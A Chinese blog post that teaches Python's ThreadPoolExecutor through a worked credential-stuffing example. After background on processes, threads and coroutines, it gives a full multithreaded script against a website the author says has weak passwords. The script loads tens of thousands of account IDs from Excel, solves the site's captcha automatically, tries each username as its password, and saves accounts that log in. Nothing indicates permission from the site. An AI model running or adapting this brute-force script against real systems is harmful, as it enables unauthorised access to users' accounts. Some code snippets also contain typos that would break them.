前言
之前发现某站可能存在弱密码(数据已脱敏),便想尝试用Python爬虫进行穷举,但是账号表里有几万条用户信息,若使用单线程则平均每分钟只能检测2-3条信息,故想使用多线程提升程序效率。python最常用的多线程相关库是threading,但显然它已经过时了,故选用官方线程池库ThreadPoolExecutor实现。
背景
进程
进程统进行资源分配的最小单位,它是程序执行时的一个实例。程序运行时系统就会创建一个进程,并为它分配资源,然后把该进程放入进程就绪队列,进程调度器选中它的时候就会为它分配CPU时间,程序开始真正运行。每个进程都有自己的独立内存空间,不同进程通过进程间通信来通信。
线程
线程是程序执行时的最小单位,它是进程的一个执行流,是CPU调度和分派的基本单位,一个进程至少包含一个主线程,也可以由很多个线程组成,线程间共享进程的所有资源,每个线程有自己的堆栈和局部变量。
协程
协程又称为微线程 ,是一种用户态的轻量级线程,协程的调度完全由用户控制。协程拥有自己的寄存器上下文和栈。协程调度切换时,将寄存器上下文和栈保存到其他地方,在切回来的时候,恢复先前保存的寄存器上下文和栈,直接操作栈则基本没有内核切换的开销,可以不加锁的访问全局变量,所以上下文的切换非常快。在python中用户调度的方式一开始是通过yield关键字 来实现的,后面有了asyncio模块来专门支持协程。
用法
ThreadPoolExecutor 使用时一定要使用 with ,而不要使用 for ,如果你一定要用 for ,那么一定要手动进行 executor.shutdown
,而 with 在使用完毕之后可以自行关闭线程池,减少资源浪费。其主要有两种创建线程的方法:
- 通过map
1
2
3
4
5
6
7
8
|
with ThreadPoolExecutor(max_workers=2) as executor:
result = executor.map(map_fun, itr_arg)
'''map_fun:你传入的要执行的map函数,也就是子线程函数
itr_arg:一个可迭代的参数,每次迭代就创建一个线程并且将本参数传入该线程函数
注意result并不是你map_fun返回的结果,而是一个生成器,如果要从中去结果,你可以使用列表生成式或者其他你想使用的方法
'''
for res in result:
print(res) #这个res就是你map_fun返回的结果,你可以在这里做进一步处理
|
- 通过submit+as_completed
1
2
3
4
5
6
7
8
9
10
11
|
with ThreadPoolExecutor(max_workers=2) as executor:
future= executor.submit(fun, args)
'''
在这里你可以使用for循环来做,返回的是一个future对象
future_list=[]
for i in range(max_workers):
future= executor.submit(fun, args[i])
future_list.append(future)
'''
for res in ac_completed(futrue_list): #这个futrure_list是你future对象的列表
print(res.result()) #循环遍历时用.result()来取返回值
|
示例
需求
现有一网站,已知其用户登录账号列表,通过枚举常用弱密码的方式尝试爆破。账号保存在Excel中,每个账号即是一个任务,将所有任务存入Queue结构中(Python的Queue结构线程安全),在子线程内不断取出Queue中的任务并完成检查。
代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
|
# 重试次数
retry = 3
timeout = 5
# 任务队列
task_queue = Queue()
# 通过检测的任务
available = []
# 初始化任务
def init():
xls_path = r"Users.xlsx"
xls = pd.read_excel(xls_path, header=0)
ids = xls.loc[:]["工号"]
for id in ids:
task_queue.put(id)
# 主登录逻辑
def login(username, password):
login_url = "login_url"
logout_url = "logout_url"
captcha_url = "captcha_url"
session = requests.Session()
# 获取初始参数
login_resp = session.get(login_url, timeout=timeout)
# ASP解析
formdata = AspUtil.extract(login_resp.text)
formdata["UserName"] = username
formdata["Password"] = password
# 获取验证码
captcha_resp = session.get(captcha_url, timeout=timeout)
# 识别验证码
formdata['CheckCode'] = getImgCheck(captcha_resp)
# 开始登录
login_resp = session.post(login_url, data=formdata, timeout=timeout)
if re.findall(r"验证码不对", login_resp.text):
return login(username, password)
if re.findall(r"登陆失败", login_resp.text):
print(username + "\t密码错误")
return False
if re.findall(r"登录成功", login_resp.text):
session.get(logout_url)
print(username + "\t登录成功")
available.append(username)
return username
# 单线程
def single_task(task_name):
# 不断访问任务队列进行处理
while not task_queue.empty():
username = task_queue.get()
login(username, username)
# 主函数
def main(max_workers):
init()
executor = ThreadPoolExecutor(max_workers)
with ThreadPoolExecutor(max_workers=max_workers) as executor:
futures = []
for i in range(max_workers):
future = executor.submit(single_task, str(i))
futures.append(future)
for res in as_completed(futures):
print(res.result())
print(available)
# 保存可用账户
with open(r"./available.txt", 'w') as fp:
json.dump(available, fp)
if __name__ == "__main__":
fire.Fire(main)
|
参考